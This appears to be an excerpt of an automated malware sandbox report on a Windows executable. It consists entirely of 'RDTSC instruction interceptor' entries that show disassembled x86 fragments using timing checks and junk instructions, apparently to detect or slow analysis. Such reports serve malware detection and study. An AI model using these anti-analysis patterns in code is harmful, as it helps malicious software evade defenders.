                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10769C2 second address: 1076A03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F863914EA38h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jmp 00007F863914EA37h 0x00000015 ja 00007F863914EA26h 0x0000001b pop edi 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1076A03 second address: 1076A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F86385196E4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B230 second address: 107B235 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B235 second address: 107B245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F86385196DAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B245 second address: 107B26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F863914EA2Eh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F863914EA2Ch 0x00000015 jbe 00007F863914EA26h 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push esi 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B26F second address: 107B276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B276 second address: 107B280 instructions: 0x00000000 rdtsc 0x00000002 je 00007F863914EA2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B6E0 second address: 107B6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F86385196D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B6EA second address: 107B6F3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B6F3 second address: 107B6F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B9A4 second address: 107B9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BB2E second address: 107BB3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F86385196D6h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BB3B second address: 107BB6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F863914EA37h 0x00000008 jmp 00007F863914EA2Fh 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BB6B second address: 107BB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BB6F second address: 107BB73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BB73 second address: 107BBA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F86385196FDh 0x0000000e push esi 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop esi 0x00000012 pushad 0x00000013 jmp 00007F86385196E9h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E38D second address: 107E391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E454 second address: 107E4E7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F86385196D6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007F86385196DEh 0x00000013 push esi 0x00000014 jbe 00007F86385196D6h 0x0000001a pop esi 0x0000001b nop 0x0000001c mov edi, 60A8FFA5h 0x00000021 push 00000000h 0x00000023 call 00007F86385196E9h 0x00000028 pushad 0x00000029 add ch, 00000012h 0x0000002c stc 0x0000002d popad 0x0000002e pop edx 0x0000002f xor edx, dword ptr [ebp+122D1ACCh] 0x00000035 push 36E69605h 0x0000003a push esi 0x0000003b jmp 00007F86385196E4h 0x00000040 pop esi 0x00000041 xor dword ptr [esp], 36E69685h 0x00000048 cld 0x00000049 push 00000003h 0x0000004b mov dword ptr [ebp+122D2B8Ch], esi 0x00000051 push 00000000h 0x00000053 mov edi, 331C7D2Dh 0x00000058 push 00000003h 0x0000005a mov si, cx 0x0000005d push B765FE60h 0x00000062 push eax 0x00000063 push edx 0x00000064 jnl 00007F86385196DCh 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E55E second address: 107E562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E562 second address: 107E568 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E568 second address: 107E5A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D1BB4h], ecx 0x00000012 push 00000000h 0x00000014 pushad 0x00000015 mov edi, dword ptr [ebp+122D1C63h] 0x0000001b mov ecx, dword ptr [ebp+122D3698h] 0x00000021 popad 0x00000022 call 00007F863914EA29h 0x00000027 pushad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E5A3 second address: 107E5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F86385196DEh 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E5C2 second address: 107E5D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E5D2 second address: 107E5DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F86385196D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E5DD second address: 107E63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push esi 0x0000000c jnc 00007F863914EA28h 0x00000012 pop esi 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jmp 00007F863914EA31h 0x0000001b jmp 00007F863914EA37h 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F863914EA37h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E63B second address: 107E67F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 and edx, dword ptr [ebp+122D3768h] 0x0000000f push 00000003h 0x00000011 mov dword ptr [ebp+122D1BA4h], ecx 0x00000017 push 00000000h 0x00000019 ja 00007F86385196DCh 0x0000001f or edx, dword ptr [ebp+122D35E8h] 0x00000025 push 00000003h 0x00000027 mov edx, 5B159238h 0x0000002c push 7A72EF55h 0x00000031 pushad 0x00000032 jmp 00007F86385196DAh 0x00000037 jo 00007F86385196DCh 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E67F second address: 107E6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 458D10ABh 0x0000000c and edx, dword ptr [ebp+122D28F8h] 0x00000012 lea ebx, dword ptr [ebp+124501CCh] 0x00000018 mov edi, dword ptr [ebp+122D27C2h] 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007F863914EA2Fh 0x00000027 push edi 0x00000028 pop edi 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109E56E second address: 109E590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F86385196E0h 0x00000009 pop edi 0x0000000a jmp 00007F86385196DDh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109EB4A second address: 109EB53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109EB53 second address: 109EB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F86385196D6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109EE1E second address: 109EE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109EE24 second address: 109EE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F86385196D6h 0x0000000d jno 00007F86385196D6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109EE37 second address: 109EE50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109EE50 second address: 109EE66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F86385196E0h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109EE66 second address: 109EE7B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F863914EA2Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F141 second address: 109F17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 je 00007F86385196F2h 0x0000000b js 00007F86385196D6h 0x00000011 jmp 00007F86385196E6h 0x00000016 jnc 00007F86385196DCh 0x0000001c jc 00007F86385196DCh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F2C3 second address: 109F2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F2C9 second address: 109F2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F2CD second address: 109F2F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA30h 0x00000007 jmp 00007F863914EA31h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F2F6 second address: 109F302 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F86385196D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F302 second address: 109F30E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F863914EA26h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F5BC second address: 109F5C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F5C3 second address: 109F5C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1096D7E second address: 1096D93 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F86385196DDh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1096D93 second address: 1096DB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F863914EA37h 0x00000009 ja 00007F863914EA26h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F891 second address: 109F8C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86385196DFh 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F86385196E9h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A02E0 second address: 10A02FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F863914EA38h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A02FC second address: 10A0302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4D3C second address: 10A4D83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a jmp 00007F863914EA30h 0x0000000f pop eax 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 push ecx 0x00000017 jg 00007F863914EA26h 0x0000001d pop ecx 0x0000001e push ecx 0x0000001f jmp 00007F863914EA35h 0x00000024 pop ecx 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 push ecx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4ECE second address: 10A4ED4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4ED4 second address: 10A4EDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4EDA second address: 10A4EF3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F86385196D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4EF3 second address: 10A4EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A7494 second address: 10A7499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC5DC second address: 10AC5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F863914EA30h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E428 second address: 106E455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F86385196E5h 0x00000009 jno 00007F86385196DCh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E455 second address: 106E45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AB8D6 second address: 10AB8F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007F86385196D6h 0x00000009 jbe 00007F86385196D6h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jnl 00007F86385196D6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AB8F4 second address: 10AB8FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABC24 second address: 10ABC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a ja 00007F86385196D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABC36 second address: 10ABC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABD95 second address: 10ABDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F86385196D6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F86385196E7h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F86385196E7h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABDD2 second address: 10ABDF9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F863914EA26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F863914EA36h 0x00000010 jl 00007F863914EA26h 0x00000016 jmp 00007F863914EA2Ah 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABDF9 second address: 10ABDFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABDFD second address: 10ABE2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F863914EA39h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC174 second address: 10AC1A0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F86385196E7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f pop esi 0x00000010 jbe 00007F86385196FFh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC1A0 second address: 10AC1BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F863914EA31h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F863914EA2Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AD599 second address: 10AD5B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86385196DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F86385196E0h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AD64C second address: 10AD652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ADBF6 second address: 10ADBFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ADD09 second address: 10ADD0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AE277 second address: 10AE27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AE379 second address: 10AE37F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AE37F second address: 10AE383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AE51C second address: 10AE522 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AE8A7 second address: 10AE8B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F86385196D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AE8B1 second address: 10AE8E7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F863914EA26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F863914EA30h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F863914EA33h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AEDE7 second address: 10AEE42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86385196DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c stc 0x0000000d push 00000000h 0x0000000f mov dword ptr [ebp+1247DAC0h], edi 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F86385196D8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 jmp 00007F86385196E9h 0x00000036 push eax 0x00000037 push ebx 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0974 second address: 10B0978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0127 second address: 10B012B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0978 second address: 10B097E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B012B second address: 10B0131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B132D second address: 10B1331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B10E7 second address: 10B10EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1331 second address: 10B134E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B10EB second address: 10B10F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B134E second address: 10B1353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1353 second address: 10B135D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F86385196D6h 0x0000000a rdtsc
